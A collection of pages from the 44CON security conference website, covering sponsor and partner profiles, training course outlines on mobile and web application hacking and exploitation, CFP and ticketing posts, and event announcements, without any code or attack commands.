
           


           Amazon

          www.amazon.co.uk

          At Amazon, we are obsessed with customer trust. Information Security maintains this by guarding the confidentiality and integrity of Amazon and customer data. We assess risk, classify data and systems, detect potential intrusion, and render useless the value of data that may be leaked.

          Our teams span over 10 countries worldwide, and our focus areas include: security intelligence, application security, incident response, security operations, risk and compliance, acquisitions and subsidiaries, and external partner security. Our mission includes instilling awareness to safeguard all customer and employee data, applications, services, and assets. To accomplish this, we unite with Amazon organizations to build security best practices into enterprise-wide systems. Our guidance and leadership equip our partners to maintain high security standards.

          We’re hiring new security talent!

           

          Silver Sponsors

          Context

          www.contextis.com

          Context is an independently managed cyber security consultancy that employs some of the best in the industry. We work on prestigious projects for clients that include some of the world’s most high profile blue chip companies. Our consultants are passionate about the technical and commercial side of security services. Our broad service portfolio covers the areas of security penetration testing and assurance, incident response and investigations, and technical security research. We are certified by CESG and CPNI for the Cyber Incident Response scheme and we helped to establish CREST and its associated standards.


           Digital Justice

          mojdigital.blog.gov.uk

          The Ministry of Justice Digital and Technology team design, build and support digital services that make a real difference to people and their families using the justice system at some of the most difficult times of their lives.

          Last year we saw nearly 1 million people interact with our simple to use, effective digital services which are built around user needs. We continue to play a major part in improving access to justice and the services we build help make that experience considerably easier and less distressing.

          Our team make sure our 74,000 staff have the tools and technology they need to provide critical services which keep tribunals, courts and prisons operating effectively across 1800 sites.

          We are using digital, data and technology to build capability, work smarter and more efficiently while reducing costs. In the next 4 years we want to create a digitally enabled end-to-end justice system which can adapt and respond to changing needs.

          If you’re interested in joining our team, send your CV and a covering letter to: recruitment@digital.justice.gov.uk


           BT

          www.bt.com

          BT is one of the world’s leading providers of communications solutions and services operating in 170 countries. Its principal activities include networked IT services; local, national and international telecommunications services; higher-value broadband and internet products and services and converged fixed/mobile products and services.

          BT Security protects both BT and its corporate and government customers. To help these customers manage and maintain resilient networked IT infrastructures round the clock, 365 days a year, BT offers a full portfolio of security consulting and managed services, including secure networking, business continuity, and identity and access management services.

          To hear more from our security experts visit: www.bt.com/letstalk/security


          Microsoft  

          www.microsoft.com

          Microsoft (Nasdaq “MSFT”) is the worldwide leader in software, services, and solutions that help people and businesses realize their full potential. Microsoft remains dedicated to software security and privacy and continues to collaborate with the community of people and technology organizations helping to protect customers and the broader ecosystem.

          Other Event Sponsors


          Black Duck Software 

          www.blackducksoftware.com

          Organisations worldwide use Black Duck products to secure and manage open source software, eliminating pain related to open source security vulnerabilities and open source license compliance. We offer subscription-based software products and on-demand audit services. Founded in 2003 and headquartered in Burlington, MA, Black Duck is a privately held company with 200+ employees and more than 1,300 Customers.

          Our Products and Services:

          • Identify and inventory open source software used to build applications
          • Map to known vulnerabilities and license requirements through an automated process that compares the inventory of open source software against Black Duck’s comprehensive Knowledge Base, the National Vulnerability Database, VulnDB, and other databases 
          • Continuously monitor for and alert teams when new open source vulnerabilities that impact the inventoried software are discovered
          • Assist teams in remediation with robust orchestration and policy enforcement features


          Memset

          www.memset.com

          Memset provide highly secured, transparently priced and intelligently designed, UK-based Infrastructure-as-a-Service Cloud hosting to developers, businesses & government.

          Our secure cloud computing services offer outstanding performance and value, the highest security accreditations and the latest technology. All backed by meaningful, industry leading SLAs with 99.95% uptime and 24/7/365 UK-based support. Customers include HSBC, BBC, Boots, GDS, Cabinet Office, Home Office, University of Westminster and many more.


          Thinkst Canaries 

          http://canary.tools

          Thinkst Canaries are deployed (and loved!) by companies all over the world. Canary allows you to deploy high quality, mixed interaction honeypots in under 4 minutes with almost zero management overhead. This means you can deploy them and forget about them, until you receive a single high quality alert that lets you know your other safeguards have failed. From Silicon Valley Unicorns to Australian Universities, from Multinational banks to small law firms, Canaries are keeping watch and blowing the whistle on otherwise undiscovered intrusions.

           

          Traditional methods of detection look for attacks, but most attackers look like regular users (not attackers!) – Canary turns your home-ground advantage into a simple, reliable method of revealing your attackers. Simple, reliable and proven worldwide. Canary. Know when it matters.


          Nettitude

          www.nettitude.com

          Cyber Strategy is part of our DNA.

          Through our Define-Defend-Detect-Respond and Assure services, we enable our customers to enhance their security posture, reduce risk and improve their cyber security strategy for the longer term. We are an award winning global leader in the creation and development of cyber security strategy. We work closely with leadership teams and the board to help organisations gain situational awareness around their current cyber security posture. We conduct both paper based, and technology focused assessments to quantify organisations’ cyber security capabilities. Through a series of robust frameworks, we then define high level cyber security objectives that will move the organisation to a mode of operation that is aligned with their risk tolerance.

          Nettitude’s highly experienced consulting team is then able to support the organisation build their cyber security strategy, allowing for quantifiable measurements to take place to track progress towards the organisation’s overall goals. Nettitude’s team of testers hold the highest technical qualifications available and provide risk based, real world, human led testing services. This includes penetration testing from the advanced techniques of Simulated Targeted Attack and Response (STAR) through to the broader assurances of Cyber Essentials, social engineering, red teaming exercises, and vulnerability assessments.


           CheckSec

          https://checksec.com

          CheckSec are proud to be back at 44CON for another year! This year we will be bringing you Canopy 3, the next iteration of our security assessment management and reporting solution. Canopy 3 adds a number of major improvements and new features, including tracking the full assessment lifecycle: from opportunity through to report delivery.


           Tigerscheme 

          www.tigerscheme.org

          Twitter: @tiger_scheme

          Tigerscheme is a commercial certification scheme for technical security specialists, backed by University standards and covering a wide range of expertise.

          Tigerscheme was founded in 2007, on the principle that a commercial certification scheme run on independent lines would give buyers of security testing services confidence that they were hiring in a recognised and reputable company.

          Tigerscheme provides for career progression through entry level certification, intermediate level certification, and senior and technical specialist roles. Certification under Tigerscheme provides a formal recognition of an individual’s skills, and is awarded on the basis of a rigorous independent assessment against published and widely-accepted standards.


          Pen Test Partners  

          www.pentestpartners.com

          Pen Test Partners LLP is a CHECK & CREST accredited pen testing company that is approved by the PCI Council to undertake card breach work as a PCI PFI. We investigate roughly half of all credit card data breaches in the UK which provides us with excellent real-time threat intelligence, used to augment our testing. We are a limited liability partnership for a very good reason; being in a partnership means that our people are heavily invested in the company. It’s that employee ownership which inspires and drives the quality in what we do.


           Positive Technologies 

          www.ptsecurity.com

          Positive Technologies is a leading global provider of enterprise security solutions for vulnerability and compliance management, incident and threat analysis, and application protection. Commitment to clients and research has earned Positive Technologies a reputation as one of the foremost authorities on Industrial Control System, Banking, Telecom, Web Application, and ERP security, supported by recognition from the analyst community.

          Learn more about Positive Technologies at ptsecurity.com

          Event Partners
          Antipøde

          http://www.blackandwhitecoffee.co.uk

          Having spent many years in Brisbane, Australia, behind the machines in a few of its most renowned coffee hangouts; Harvey’s (under chef PJ McMillan), Au Cirque and The Little Larder, it became quickly apparent after moving to London, that the city was crying out for the simple things in life, like a good flat white.

          Our Raison d’être is simple – to provide the London public with the quality and standards associated with Australian coffee culture.

          ESW Solutions

          http://www.eswav.com

          Founded in 1995, ESW Solutions has quickly become a major force in the Audio Visual industry – building on its first class reputation for customer service, quality and commitment. From a large multi room European conference to a small meeting we have the experience to make your event successful. We also produce live events for a wide range of clients, Awards Ceremonies, Talent Competitions, Festival Stages etc.

          ESW is also the home to Talking Slides a unique product that gets content presented at your conference online and ready to view in a simple, cost-effective and hassle-free manner. We attend your event and capture the presentations as they happen. However, the recording of your event is just the beginning.

          We take the high-definition presentation recordings and host them within our Talking Slides management system, complete with search facilities, registration options and even pay-per-view access.

          #####EOF##### Hacking 44CON’s Pricing Model (5 Different Ways) – 44CON

          Hacking 44CON’s Pricing Model (5 Different Ways)


          It seems like it was only two weeks ago when we announced the early bird tickets, but sadly all 50 have been snapped up. Still, being the great folks we are, we wanted to show you 5 different ways to hack the 44CON ticket pricing model because, well, basically we’re good guys like that. After all, we taught you how to game the 44CON CFP and that worked well. In the words of every security researcher everywhere, “What could possibly go wrong?”

          Understanding Our Pricing

          Traditionally our ticket scheduling has gone Early Bird -> 44CON Standard Ticket. This year, our pricing is a little different. We now have:

          • Early Bird: £299
          • Standard Ticket: £349
          • On the door: £399

          You can buy a standard ticket here, but read on for our hacks.

          In addition to this we’ve run a free registration Wednesday night event. This year we’ve invited the ManyHats Club to run our Thursday night session, so our free registration ticket gets you in to both evenings instead of one. The free ticket also gets you into our CTF space so you can take part in the CTF. These tickets aren’t out yet, so keep an eye out on the socials and make sure you’re subscribed to our newsletter.

          We’ve also redesigned the main hall with more of an expo feel based on a village concept. This means we’re going to offer expo tickets that give you access to the hall. These tickets are only going to be available to certain groups and will be limited.

          Hack 1: Exploit Discounts

          We run discounts with groups such as the ISSA, OWASP and CREST. Please do use them, that’s what they’re there for. If you book a training course for any of our March, June or September 2019 training you’ll get a discount on tickets equivalent to Early Bird pricing up to but not including tickets bought on the day.

          Hack 2: Apply for Assistance

          Last year we ran an assistance programme for those who otherwise wouldn’t be able to come. We’ll do the same this year. Assistance tickets include full event entry and accommodation. It’s the cheapest way to get to 44CON. You’ll need to qualify for a ticket, and we haven’t yet launched 2019’s programme. It’ll probably launch in the late spring, so around May/June but it’s going to come down to this year’s sponsors, such as the awesome wire security.

          The criteria for this year’s assistance tickets are yet to be determined but we’re mainly focused on deprived areas of the UK outside London and people from economically disadvantaged backgrounds or situations.

          Hack 3: Apply to Join the Crew

          The crew work extremely hard to make 44CON what it is, but on the plus side there’s a lot of love amongst the crew. You’ll get to see some of the talks and, of course, you’re crew with all the crewdos that brings (Ouch – Adrian). If that sort of thing floats your boat, crew applications will be up later this year.

          Hack 4: Split a ticket

          We don’t track your identity while at the event. If your friend has a full ticket, you have an expo ticket and want to swap, then by all means feel free to swap tickets if there’s a particular talk you want to see. We just ask that you don’t abuse it – sharing with a couple of mates is fine. Sharing with heaps of randos, taking the mickey and selling access to talks is a violation of the house rules.

          Hack 5: Ask!

          If your hackerspace, hacking society or club would like a discount code, email us for one. This is really handy when used with Hack 4.

          If there’s something you’d like to run at 44CON inside the event, let us know. We have community spaces for groups like OWASP, the ISSA and CREST amongst others. Some of our sponsors are also looking for help on their stands. Keep an eye out for announcements on our mailing list and pounce when you get the chance.

          #####EOF##### Partners of 44CON – 44CON

          Partners of 44CON

           

          Conference Partners

          DeepSec

          https://deepsec.net

          Bringing together the world’s most renowned security professionals from academics, government, industry, and the underground hacking community.

          SteelCon

          https://www.steelcon.info/

          SteelCon is an event held in the North of England for anyone who is interested in how things work, how things can be broken and how they can be fixed. It’s for people who like to tinker with things, aren’t happy with something until they know how it does what it does and won’t let something be broken without trying to fix it. SteelCon 2018 took place on 3rd-8th of July and 44CON ran the soldering area, we hope you saw us there!


          Hack in the Box

          http://conference.hitb.org/

          HITBSecConf or the Hack In The Box Security Conference is an annual must attend event in the calendars of security researchers and professionals around the world. Held annually in Kuala Lumpur, Malaysia and Amsterdam in The Netherlands, HITBSecConf is a platform for the discussion and dissemination of next generation computer security issues. Our events routinely feature two days of trainings and a two-day multi-track conference featuring cutting-edge hardcore technical talks delivered by some of the most respected names in the computer security industry. HITBSecConf is a place where ideas are exchanged, talent discovered and genius celebrated.

          Suits & Spooks

          http://www.suitsandspooks.com

          Suits and Spooks London 2015 was held at the techUK facility in London. Following a fantastic event in 2014, Suits and Spooks London 2015 was our first 2-day international event. Speakers included Marina Litvinenko, the widow of the Russian FSB officer who was poisoned in London with radiation, EJ Hilbert of Kroll Associates, Zach Tumin of the NYPD, and many more. We’ll also have representatives from the British government speaking and in attendance, along with British Venture Capitalists and the usual mix of public and private sector participants.

          Media Partners

          O’Reilly

          http://www.oreilly.com/

          O’Reilly provides technology and business training, knowledge, and insight to help companies succeed in the face of huge economic and technological shifts confronting businesses today. Our unique network of security experts and innovators share their knowledge and expertise on the company’s comprehensive training and information platform and at the O’Reilly Security conference in New York.

          Community Partners

          BSides London

          http://www.securitybsides.org.uk

          B-Sides London, Security B-Sides is a community-driven event built for and by information security community members.

          BSides London 2018 took place on 6 June 2018 at the ILEC conference centre.

          CREST

          CREST is the not-for-profit accreditation and certification body representing the technical information security industry. CREST provides internationally recognised accreditation for organisations and individuals providing penetration testing, cyber incident response and threat intelligence services.

          All CREST Member Companies undergo regular and stringent assessment; while CREST qualified individuals have to pass rigorous examinations to demonstrate knowledge, skill and competence. CREST is governed by an elected executive board of experienced security professionals who also promote, develop and support awareness, ethics and standards within the cyber security marketplace.

          Follow us on Twitter: @crestadvocate

          44CON will be a community sponsor of CRESTCon 2019 that will take place on 14th March 2019 at the Royal College of Physicians in London.

           IISP

          The Institute of Information Security Professionals (IISP) is a not-for-profit organisation, owned by its members and dedicated to raising the standard of professionalism in information security and the industry as a whole. The IISP does this through accrediting skills and competence, by sharing best practice and by providing a network of support and guidance on individual skill development. It speaks with an authoritative voice and its competency based memberships are widely recognised in the information security industry.

          Working closely with the Information Security community, the IISP has a growing membership of over 2,600 individual members across private and government sectors, forty two Corporate Member Organisations and seventeen Academic Partners.

          At the heart of the Institute is the IISP Skills Framework©2012 which is widely accepted as the de facto standard for measuring competency of Information Security Professionals. CESG have taken this framework to underpin a range of certification schemes including the Certified Professional Scheme (CCP), for which the IISP is the leading certifying body, and to develop syllabuses for Masters Degrees. The skills framework is used extensively by our corporate members to benchmark and develop capability of their employees; it has also been adopted by e-Skills UK to develop a National Occupational Standard for Information Security. The IISP also accredits training courses offered by commercial training providers against the Institute’s Skills Framework. This enables attendees to build knowledge in areas of the skills framework where they might have gaps and to gain hands-on experience.

          More information about the IISP and its work can be found at www.iisp.org.

          ISSA-UK

          Welcome to ISSA-UK, the UK Chapter of the ISSA. With active participation from individuals and chapters all over the world, the Information Systems Security Association (ISSA) is the largest international, not-for-profit association specifically for information security professionals. Having welcomed over 1,800 members since our beginnings in 2003, the ISSA-UK Chapter is the world’s most successful chapter. At only $95 per year for membership, we offer the most value out of any security association globally.

          RawHex

          We break things so you don’t have to. We build things so you can do, too. Home of the HIDIOT, the little computer you can build yourself.

          OWASP

          The Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software. Our mission is to make software security visible, so that individuals and organizations are able to make informed decisions.

           

          The Mobile Application Hacker’s Handbook: Live Edition

          Presented By: Razvan Sima, MDSec

          The course begins with a brief introduction to mobile application security and the OWASP mobile top ten, following chapter 1 of the book. When delegates are comfortable with general mobile application security practices, we delve into the security of the iOS platform, including an overview of the platform security features, jailbreaking and approaches to app security assessment. Day two of the course picks up at chapter 6, discussing the various attack surfaces for the Android platform and how to approach an app assessment. We then walk through the details of techniques from chapters 7 and 8 that can be used to attack Android applications.

          The 2 day course will take place on the 10th & 11th September 2019 in London.
          The price is £1,300 (inc VAT). Book your place in our shop now.

          Learning Objectives

          During the course beginner and intermediate security researchers will learn basic skills as an introduction to mobile security assessments. Advanced topics will also be covered during the 2-day course including reverse engineering and runtime instrumentation. Key learning objectives can be summarised as follows:

          • The security protections on iOS and Android devices
          • How iOS and Android devices are jailbroken or rooted
          • How to quickly and efficiently pinpoint and exploit vulnerabilities in iOS and Android apps
          • How to decompile, reverse and patch iOS and Android apps
          • How to hack WebViews, client-side databases and the keychain
          • Instrument application runtimes using Frida
          • How to intercept network traffic and bypass certificate pinning
          • Exploitation of IPC mechanisms including content providers, URL handlers, application extensions, broadcasts, activities and intents
          • Practical exploitation of poorly implemented cryptography
          • Bypass security controls such as root or jailbreak detection
          • Real-world techniques used to defeat real apps on iOS and Android
          • Knowledge of defensive and remedial advice

          Course Outline

          Day 1 – iOS:

          • Reverse engineering and patching binaries,
          • Insecure file storage,
          • Keychain attacks,
          • Insecure transport security,
          • Instrumenting the iOS runtime,
          • Injection attacks,
          • How to exploit IPC handlers,
          • How to defeat security controls like jailbreak detection,
          • Instrumentation on non-jailbroken devices.

          Day 2 – Android:

          • Reverse engineering and decompiling Android apps,
          • Insecure file storage,
          • Insecure transport security,
          • Instrumentation of the Dalvik and ART runtime with Frida,
          • Exploitation of insecure IPC endpoints,
          • App jacking.

          Target Audience

          This course is ideally suited for penetration testers or developers wanting to gain a foothold into penetration testing mobile devices and mobile apps.

          Student Requirements

          A basic knowledge of programming and mobile security concepts is useful but not essential.

          What to Bring

          • Administrative access to a laptop with the ability to install a few tools, and disable personal firewalls or virus scanners should they get in the way of the lab exercises.
          • Laptop with the capability to connect to wireless and wired networks.
          • We recommend at least 8GB of RAM with at least 16GB of disk space free.

          Software Requirements

          Students require a player to run VirtualBox images. Instructions will be provided well ahead on how to set up the VM software and download the VM image.

          Students will be provided with

          • The training material in electronic format
          • A mobile hacking virtual machine, packed with all the tools to perform an assessment
          • Downloadable copies of the labs that they can take away and work on in the future
          • After course e-mail support

          About the Trainer

          Lead Instructor – Razvan Sima

          Razvan is head of mobile service line at MDSec and has been with the company for over 4 years. The MDSec team have provided training at conferences, security organisations and clients for the past 14 years. Our experienced team are renowned experts in the field of application security, backed by our leading publications the Mobile Application Hacker’s Handbook and the Web Application Hacker’s Handbook. Our penetration testing team have been responsible for thousands of assessments delivered to financial, government and retail organisations across the globe; let us share our experience with you.

          Book your 44CON 2019 training course now!

          44CON CYBER SECURITY TRAINING 2016

          The below training courses will be run from 27th April 2016. We are hoping to hold the training in the same venue as 44CON Cyber Security; this will be confirmed at a later date.

          Presented by: Dawid Czagan

          Have you ever thought of hacking web applications for fun and profit? How about playing with authentic, award-winning security bugs identified in some of the greatest companies? If that sounds interesting, join this unique hands-on training!

          Dawid Czagan will discuss security bugs that he has found together with Michal Bentkowski in a number of bug bounty programs (including Google, Yahoo, Mozilla, Twitter and others). You will learn how bug hunters think and how to hunt for security bugs effectively. To be successful in bug hunting, you need to go beyond automated scanners. If you are not afraid of going into detail and doing manual/semi-automated analysis, then this hands-on training is for you.

          Course Length: 2 days

          44CON 2013 Training

          Android Security Workshop

          MWR InfoSecurity

          The training course is designed for:

          • Android developers who have a basic understanding of Android security but wish to improve their knowledge about the options available to them in more unusual or difficult situations. The workshop will present them with opportunities to see mistakes made by others, witness and recreate exploits and to redesign and secure vulnerable functions under supervision.
          • Android security testers with basic understanding of Java and Android pen-testing. The workshop will give them the opportunity to see difficult to solve security issues, develop tests to locate the issues and write exploits against them.

          The training course will teach attendees about the implementation details of the Google Android operating system (OS), the impact this has on the security posture of custom applications and the Google Android device.

          Course Length: 2 days


          The Web Application Hacker’s Handbook, 2nd Edition: LIVE!

          MDSec (Marcus Pinto)

          The Web Application Hacker’s Handbook (WAHH) Series is the most deep and comprehensive general purpose guide to hacking web applications that is currently available. This course is a practical opportunity to take the skills and theory taught in the book to the next level, experimenting with all of the tools and techniques against numerous vulnerable web applications and labs, under the guidance of the book’s authors. The course also includes new material from the second edition of WAHH, bringing the course right up to date with the latest attacks.

          Course Length: 2 days


          The Advanced Exploit Laboratory

          Saumil Shah

          The Advanced Exploit Laboratory is an all new intermediate to advanced level class, for those curious to dig deeper into the art and craft of software exploitation. We begin with a quick overview of stack overflows, exception handler abuse, memory overwrites, and other core concepts. The class then moves on to use-after-free bugs and vtable overwrites, especially applicable to browser and PDF exploits. The class also spends a lot of time focusing on defeating modern day exploit mitigation techniques like DEP and ASLR using Return Oriented Programming (ROP).

          To add extra punch, we are introducing an all new section on practical exploitation of browsers on the Android platform and working with ARM exploits. This is one class you don’t want to miss!

          The Exploit Laboratory requires a lot of hands on work. Lab examples used in this class cover Linux, Windows and Android platforms, featuring popular third party applications and products instead of simulated lab exercises.

          As with the popular Exploit Laboratory, all topics are delivered in a down-to-earth, learn-by-example methodology. The same trainers who brought you The Exploit Laboratory for over eight years have been working hard in putting together advanced material based on past feedback.

          Course Length: 2 days

          This is the 100% genuine Exploit Lab! No imitations, no rip-offs


          Hacking by Numbers – Mobile Edition

          SensePost

          Mobile phone usage continues to grow at an outstanding rate, with mobile applications an increasingly common development target. This course will teach how to go about testing mobile platforms, and installed applications to ensure they have been developed in a secure manner.

          Hacking By Numbers Mobile will give you a practical window into the methods used when attacking mobile platforms. This course is ideal for penetration testers/auditors/developers who are new to the mobile area and need to understand how to analyse and audit applications on various mobile platforms using a variety of tools and platforms. This course uses a mixture of lectures, hands-on-labs, demonstrations and group exercises. You’ll tear apart 10 mobile applications looking for flaws and exploiting them.

          This is a new course in the Hacking By Numbers series and one we are incredibly excited about.

          Course Length: 2 days

          SteelCon2018 Tickets up for Grabs!

          Ey up, We’ve got two SteelCon 2018 Tickets to give away. Make like a whippet and you too could be at Sheffield’s finest hacker conference!

          Nah then, 44CON will be exhibiting at SteelCon in July 2018. We’re also running a soldering area and have stickers and reyt good goodies to grab! Even better, we have two tickets to give away! As lovely as it is, Sheffield is uphill both ways in the snow. If you’re heading up from that London, make sure you wrap up warm.

          How to enter:

          For a chance to win one of two SteelCon 2018 tickets all you have to do is this before the 31st of May 2018:

          1. Purchase a 44CON 2018 ticket
          2. Make sure you’re signed up to the 44CON mailing list (you can do this by ticking the relevant box when purchasing your ticket or here).

          Obligatory fine print:

          Don’t stress love, if you’ve already bought a ticket and are signed up to our mailing list using the same email address for both, you’re already in the draw.
          Winners will be contacted around the 4th of June 2018. If you would rather someone else had your SteelCon 2018 ticket just let us know and we’ll make it happen.
          Marizel is running the draw, and her decision is final. She cannot be bribed with crisps, breadcakes, nor flat caps, although you’re welcome to try.

          We’d love to see you at SteelCon!

          If you’re planning to attend SteelCon 2018 please come over and say hi. We’ll be the ones selling 44CON tickets, sticking things to people and soldering to our <3’s content. The SteelCon team have two 44CON 2018 tickets to give away, so look out for a chance to win these too.

          CRESTCon & IISP Congress 2018

          44CON is exhibiting at CRESTCon & IISP Congress on 3rd May at the Royal College of Physicians in London. Tickets are available now – www.crestandiisp.com.

          Now in its sixth year, CRESTCon and IISP Congress is a unique event that brings together leading technical and business information security professionals and is a key date in the industry calendar, attracting an impressive line-up of speakers and senior delegates.

          This year it also welcomes the BCS Security Conference in the third stream. 2017’s event welcomed over 450 delegates, had three conference streams, a bookshop/meeting area, as well as expanded exhibition and demo areas and 2018 is building further on the success of these features. The length of the day is being increased to incorporate further networking and entertainment in response to the feedback received from delegates and sponsors.

          Delegates at the event include senior security, risk and compliance managers from a wide range of public and private sector organisations, along with security consultants and business directors working in the technical information assurance and response industry.

          If you’re attending, please stop by and say hello to Steve and Marizel!

          44CON 2018 CFP Is Open!

          We’re really excited to open our Call For Papers for 44CON 2018. We’re looking forward to seeing all of your submissions on our shiny new CFP system, which promises to be far less painful than the old one.

          44CON consists of 2 dedicated speaking tracks, a dedicated workshop track and combined speaking/workshop track over the two days. Talks range from softer subjects in areas such as governance, law and policy through to reverse engineering, exploitation, tooling and abuse of weird machines. We also have an open evening freely accessible to all (but with pre-registration) on the Wednesday evening before the main event.

          Talks are 45 minutes long, while workshops are 60-120 minutes in length. All submissions are welcome but some useful guidance on particular topics of interest can be found at the CFP submission system.

          As usual, speakers from outside of Fulham, Putney or London Underground Zone 1 will have travel reimbursed. We’ll provide two nights accommodation for speakers or workshop presenters with more than an hour’s travel to a mainline London rail station. We’ll bump that to 3 nights accommodation for any accepted speaker providing a talk and a workshop.

          If you’re interested in submitting something, we highly recommend reading last year’s How To Game The 44CON CFP blog post.

          The CFP closes on Monday 30th April 2018 at 23:59 UTC. We’ll start notifying speakers by the 4th of June and announce our first round of accepted speakers on the 6th of June at BSides London. Full details of dates can be found on the CFP system.

          44CON 2017 Schedule Available.

          Here you go folks, the 44CON 2017 schedule is now available here.

          Go take a look at all the wonderful talks and workshops we have lined up for you! As with all things the schedule could be subject to some last minute changes so make sure you keep an eye out on the day so you don’t miss out.

          If you haven’t got your ticket yet there are some still available here.

          We look forward to seeing you all in September.

          CTF 2017

          This year we are delighted to announce that Immersive Labs will be running the 44CON 2017 CTF and they have some great challenges in store for you! Make sure you stop by and see them. 

          They will make their platform available to all 44CON participants, enabling you to take on over 150 cyber security challenges during the conference. Immersive Labs exercises combine both CTF style and sign-posted challenges ranging from Beginner to Advanced. 

          A real-time leaderboard will keep track of participants including the individual labs they’ve completed. Immersive Labs will be providing opportunities for the top 10 users to become “Immersive Original” lab producers which attract a £1000 payment for each lab.

           

           

          The 44CON CFP just closed. You won’t believe what happens next.

          Edit: This post was originally written just after the CFP closed in 2017. If you’re here from a CFP-related link, don’t assume this year’s CFP is closed. If you’re not sure, check the CFP system for the latest info.

          Each year 44CON attracts between 100-200 submissions. Some of these are excellent talks, some are average and some are, well, let’s just say that some are below average. In this blog post I’ll try to go through what happens when the CFP closes and to help you answer the immortal question, “Has my talk been accepted/rejected?”

          Along the way I’ll announce our first accepts, and most importantly explain the why of our CFP process.

          Continue reading “The 44CON CFP just closed. You won’t believe what happens next.”

          Network Forensics: A blog post by Erik Hjelmvik

          I have learned a lot about how to track malware and attackers in network traffic while developing and improving the network forensics tool NetworkMiner throughout the past 10 years. The primary purpose of NetworkMiner has always been to help incident responders and forensic investigators to do their job more efficiently. Even though NetworkMiner is my favourite tool for analysing PCAP files I’m still a regular user of other tools such as Wireshark, tshark, tcpdump, Argus, ngrep, tcpflow and of course CapLoader. However, incident response and forensic work is much more than just knowing what tools to use. It is more about knowing what data to analyze and why.

          I will teach several of my favourite techniques for analysing intrusions, tracking criminals and doing threat hunting at the Network Forensics Training at 44CON. The participants will learn how to investigate intrusions and find forensic artefacts in a dataset of several gigabytes of captured network traffic. The training primarily focuses on practical analysis techniques for finding and tracing malicious actors, which involves a great deal of hands-on practice with finding evil in PCAP data.

          The first day of training focuses on analysis using only open source tools. The second day primarily covers training on the commercial software from Netresec, i.e. NetworkMiner Professional and CapLoader. All students enrolling in the class will get a full 6 month license for both these commercial tools. This training is not only a unique opportunity to learn how to use NetworkMiner and CapLoader directly from the guy who develops them, it is also a great excuse to spend two full days playing around with PCAP files.

          You can find more details about the training here.

          CRESTCon & IISP Congress 2017

          44CON is exhibiting at CRESTCon & IISP Congress on 19th April at the Royal College of Surgeons in London. Tickets are available now – www.crestandiisp.com. 

          CRESTCon & IISP Congress 2017 focuses on cyber security threats, vulnerabilities and industry challenges.

          Now in its 5th year, CRESTCon & IISP Congress is a unique event that brings together over 400 leading technical and business information security professionals with a choice of three conference streams along with an exhibition, demo area and research library. The event is run by not-for-profit organisations CREST, which represents the technical information security industry, and the Institute of Information Security Professionals, the leading accreditation body and industry authority.

          CRESTCon & IISP Congress in April will feature keynote presentations from a senior NCSC spokesperson and Tarah Wheeler, website security czar at Symantec. Other presentations across the event’s three speaker tracks put the spotlight on topics ranging from how an organisation’s email can be turned against it, protecting wearable technology and cognitive security, through to detecting and bypassing sandboxes, blockchain, and the future of malware.

          Stream 1 delivers presentations that are technical in nature and related to penetration testing, incident response or threat intelligence. Stream 2 will look at the cyber security landscape and attempt to predict changes over the next decade, while stream 3 is all about working together to build and enhance cyber skills.

          If you’re attending, make sure you stop by and say hello to Emma & Steve.

          44CON 2013 Sponsors

          Platinum Sponsor
          NCC Group is a leading global information assurance company, providing freedom from doubt that all critical material is available, protected, and operating as it should be at all times. Information assurance is delivered through escrow and verification, security testing, audit and compliance, software testing and web performance services.
          Gold Sponsors
          MWR InfoSecurity

          http://www.mwrinfosecurity.com

          Established in 2003, MWR InfoSecurity is a research-led information security consultancy. MWR consults with clients around the world, providing specialist advice and services on all areas of security, from mobile through to supercomputers. As a company we invest heavily in knowledge sharing and we are proud to be a part of an event that provides a platform for discussion on the latest thinking and research in the InfoSec arena.

          Silver Sponsors
          Microsoft

          http://www.microsoft.com/security

          Microsoft is proud to be a sponsor of the 44CON Security Conference. 44CON provides a forum in which security researchers from all over the world, IT pros, and industry luminaries can share insights, knowledge and information to advance security research. We’re happy to be here and glad to be part of the community.

          BT

          http://www.bt.com/letstalk/security

          BT is one of the world’s leading providers of communications solutions and services operating in 170 countries. Its principal activities include networked IT services; local, national and international telecommunications services; higher-value broadband and internet products and services and converged fixed/mobile products and services.

          Bronze Sponsors
          CheckSec

          https://www.checksec.com

          CheckSec was founded by security professionals for security professionals. Our goal is to create technologies that help improve the assessment and management of information security.

          Mandalorian

          http://www.mandalorian.com

          Mandalorian are an independent UK-based provider of information security services with specialisms in penetration testing and malware analysis. We focus on being the easiest supplier you’ve ever worked with and being fanatical about the quality of our work.

          alien8

          Norman Shark

          http://normanshark.com

          Norman Shark, founded in Oslo, Norway in 1984, is a world leader in proactive content security solutions and forensics malware tools. The company offers market-leading advanced malware analyzers as well as high-performance network protection against cyber-attacks. Norman’s automated malware analysis technology integrated with our Network Threat Discovery system automatically collects and detects malicious files for protection against targeted attacks. Please visit www.normanshark.com for more information.

          SensePost

          http://sensepost.com

          The lack of a world-class security conference in the UK has finally been filled by 44CON. No longer does the UK infosec community have to go overseas to see security researchers present cutting-edge research and ideas. SensePost is proud to be associated with 44CON.

          BlackBerry

          http://www.blackberry.com/security

          BlackBerry, a global leader in wireless innovation, revolutionised the mobile industry with the introduction of the BlackBerry® solution in 1999. BlackBerry Security is a world class organisation working to make BlackBerry one of the most secure mobile platforms available by providing an end to end security focus including: driving the BlackBerry security message globally, acquiring and maintaining security accreditations, active involvement in the development of security products, uncovering threats through advanced research, building mitigations into BlackBerry products, and helping to protect customers by rapidly responding to security incidents as they occur.

          44CON Supporters
          Raytheon

          http://www.raytheon.com

          Raytheon has more than 30 years of experience securing some of the world’s most critical and sensitive programmes and systems. We work in some of the most demanding cyber security and intelligence environments in the world and bring our customers the capabilities and cyber business change to ensure they stay ahead of threats. We look at ways organisations can actively disrupt the command and control of an adversary within their domain; the focus is not purely on a layered defence.

          SecQuest Information Security

          https://secquest.co.uk

          Following on from presentations at 44CON 2011 & 2012, SecQuest Information Security Ltd is delighted to be “giving something back” to the industry and sponsoring 44CON 2013. SecQuest was formed by two security consultants, previously members of IBM’s X-Force security testing team, with over twenty years of industry experience. SecQuest specialise in “red-team” penetration testing and have expertise in IBM related technologies including iSeries and Lotus Domino along with less well known areas affecting data security such as microwave links, V-SAT, VHF / UHF radio link telemetry and embedded systems.

          CREST

          http://www.crest-approved.org

          CREST is a not-for-profit organisation that represents the technical information security industry, primarily penetration testing, cyber security incident response and security architecture services. CREST offers public and private sector organisations an assurance that the information security advisors they appoint are competent, qualified and professional with current knowledge. It also ensures that the CREST member companies they engage with have the appropriate processes and controls in place to perform the services for which they have been appointed and protect sensitive client-based information.

